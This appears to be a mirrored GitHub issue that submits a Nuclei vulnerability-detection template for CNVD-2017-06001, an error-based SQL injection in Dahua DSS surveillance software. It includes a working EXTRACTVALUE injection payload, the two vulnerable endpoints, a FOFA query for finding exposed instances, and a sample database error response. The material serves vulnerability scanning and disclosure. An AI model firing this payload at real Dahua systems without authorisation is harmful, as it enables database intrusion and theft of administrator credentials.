Giters

projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.

Home Page:https://github.com/projectdiscovery/nuclei

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

[nuclei-template] CNVD-2017-06001 Dahua DSS SQL injection

shibeta opened this issue · comments

commented

Template Information:

Dahua DSS Digital Surveillance System is a security video monitoring system developed by Dahua.

A SQL injection vulnerability exists within Dahua DSS. Attackers can send specially crafted data packets to the attachment_clearTempFile.action or attachment_getAttList.action route, exploiting error-based injection to acquire sensitive information from the database. Beyond obtaining information from the database such as administrator credentials and personal information of users on the site, attackers could potentially write trojans to the server with sufficient privileges and further gain system-level access.

Relevant vulnerability ID: CNVD-2017-06001

Nuclei Template:

id: CNVD-2017-06001

info:
  name: error-based SQL Injection in Dahua DSS
  author: napgh0st
  tags: cnvd,cnvd2017,sql-injection,dahua
  reference: https://www.cnvd.org.cn/flaw/show/CNVD-2017-06001
  severity: high
  metadata:
    fofa-query: app="dahua-DSS"

variables:
  random_num: "{{rand_int(10000, 99999)}}"
  random_text: "{{rand_base(5)}}"
  payload: "{{rand_int(800000, 999999)}}"
  poc: "1') AND EXTRACTVALUE({{random_num}},CONCAT(0x5c,(SELECT (ELT({{random_num}}={{random_num}},{{payload}}))),0x5c)) AND ('{{random_text}}'='{{random_text}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/portal/attachment_clearTempFile.action?bean.RecId={{poc}}&bean.TabName=1"
      - "{{BaseURL}}/portal/attachment_getAttList.action?bean.RecId={{poc}}&bean.TabName=1"

    stop-at-first-match: true

    matchers:
      - type: word
        part: body
        condition: and
        words:
          - "XPATH syntax error"
          - "{{payload}}"

valid match response snippet:

org.springframework.jdbc.UncategorizedSQLException: PreparedStatementCallback; uncategorized SQLException for SQL [select * from C_ATTACHMENT t where 1=1 and t.tab_Name=?   and t.rec_Id in('1') AND EXTRACTVALUE(32776,CONCAT(0x5c,(SELECT (ELT(32776=32776,909836))),0x5c)) AND ('6jQ6F'='6jQ6F')   and t.tmp_flag = ?]; SQL state [HY000]; error code [1105]; XPATH syntax error: '\909836\'; nested exception is java.sql.SQLException: XPATH syntax error: '\909836\'
commented

Hello @shibeta, thank you so much for sharing this template with the community and contributing to this project 🍻

You can grab some cool PD stickers over here http://nux.gg/stickers 😄